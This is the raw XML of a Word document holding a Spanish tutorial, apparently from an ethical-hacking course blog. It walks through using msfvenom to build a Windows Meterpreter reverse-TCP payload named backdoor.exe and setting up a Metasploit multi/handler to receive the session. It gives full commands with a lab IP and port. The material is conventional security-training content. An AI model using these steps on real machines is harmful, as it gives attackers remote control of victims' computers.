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bookmarkEnd w:id="26"/>
    <w:bookmarkStart w:id="27" w:name="X8d878804e5c05be6cd15589bc249895e0604141"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Creando y Ejecutando un Payload Malicioso con Metasploit: Una Guía Paso a Paso</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hola a todos! Hoy vamos a sumergirnos en el fascinante mundo de la seguridad informática y la creación de un payload malicioso usando Metasploit. Si bien esta guía es con fines educativos, es crucial recordar que utilizar estas herramientas para actividades maliciosas es ilegal y antiético. ¡Usémoslas para aprender y proteger!</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="27"/>
    <w:bookmarkStart w:id="28" w:name="X6fd5f2de1a29374c6c843eecf273683e6ec1496"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Paso 1: Obtener la Dirección IP con ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Primero, necesitamos conocer nuestra dirección IP local para configurar el payload. Usamos el comando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para obtener esta información. Abre tu terminal y escribe:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Esto mostrará todas las interfaces de red y sus respectivas direcciones IP. Busca la IP de tu red local. En este ejemplo, supongamos que es</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.122.152</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="28"/>
    <w:bookmarkStart w:id="29" w:name="paso-2-crear-el-payload-con-msfvenom"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Paso 2: Crear el Payload con msfvenom</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ahora que tenemos nuestra dirección IP, vamos a crear el payload. Usaremos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, una herramienta que viene con Metasploit para generar payloads maliciosos. Queremos crear un payload que permita un acceso remoto a una máquina con Windows. Usamos el siguiente comando:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">msfveno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windows/x64/meterpreter/reverse_tcp LHOST=192.168.122.152 LPORT=4444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xe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ackdoor.exe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x64</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Desglosamos el comando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p windows/x64/meterpreter/reverse_tcp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Especificamos el payload, que en este caso es un Meterpreter reverse TCP para Windows de 64 bit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HOST=192.168.122.152</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Establecemos nuestra dirección IP local como el host de escucha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PORT=4444</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Elegimos el puerto de escucha (puedes cambiarlo si es necesario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f exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Indicamos que el formato de salida debe ser un archivo ejecutable de Window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o backdoor.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Nombramos el archivo de salida</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">backdoor.ex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a x64</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Especificamos la arquitectura del payload (64 bits).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="29"/>
    <w:bookmarkStart w:id="30" w:name="Xf24951cc03a16e8693cb853fa7ba601c8f91e7c"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Paso 3: Configurar el Handler en Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Una vez que tenemos nuestro payload, necesitamos configurar un handler en Metasploit para escuchar las conexiones entrantes. Iniciamos Metasploit con:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">msfconso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</w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La opción</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-q</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">es para iniciar Metasploit en modo silencioso.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="30"/>
    <w:bookmarkStart w:id="31" w:name="paso-4-configurar-el-exploit-handler"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Paso 4: Configurar el Exploit Handler</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">En la consola de Metasploit, seguimos estos paso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eleccionar el handler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se exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1000"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Esto indica que usaremos el módulo handler para gestionar la conexión entrant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onfigurar el payloa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t payload windows/x64/meterpreter/reverse_tcp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stablecer el LHOST y LPOR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t lhost 192.168.122.152</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w: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t lport 4444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erificar las opcion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how options</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1000"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Esto muestra todas las opciones configuradas para asegurar que todo esté correcto.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="31"/>
    <w:bookmarkStart w:id="32" w:name="paso-5-ejecutar-el-handler"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Paso 5: Ejecutar el Handler</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Finalmente, ejecutamos el handler para empezar a escuchar conexiones:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ms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un</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ahora, el handler está activo y esperando que alguien ejecute el</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">backdoor.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">en su máquina. Cuando esto suceda, obtendrás una sesión de Meterpreter y podrás interactuar con la máquina comprometida.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="32"/>
    <w:bookmarkStart w:id="33" w:name="conclusión"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Conclusión</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Este proceso demuestra cómo se puede crear y manejar un payload malicioso usando Metasploit. Nuevamente, subrayo la importancia de utilizar este conocimiento de manera ética y legal, principalmente para probar y fortalecer la seguridad de sistemas. Siempre asegúrate de tener permiso para realizar estas pruebas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Espero que hayas encontrado esta guía informativa y útil. ¡Hasta la próxima!</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="33"/>
    <w:bookmarkStart w:id="36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3"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId34"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId35">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Ejecutando Payload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6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5" Target="https://achalmaedison.netlify.app/tecnologia-seguridad/ciberseguridad-ethical-hacking-ceh/2024-09-03-ejecutando-payload" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId34" Target="https://achalmaedison.netlify.app/tecnologia-seguridad/ciberseguridad-ethical-hacking-ceh/2024-09-03-ejecutando-payload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achalmaedison.netlify.app/tecnologia-seguridad/ciberseguridad-ethical-hacking-ceh/2024-09-03-ejecutando-payload" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId34" Target="https://achalmaedison.netlify.app/tecnologia-seguridad/ciberseguridad-ethical-hacking-ceh/2024-09-03-ejecutando-payload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8:15Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-04-05T19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2-16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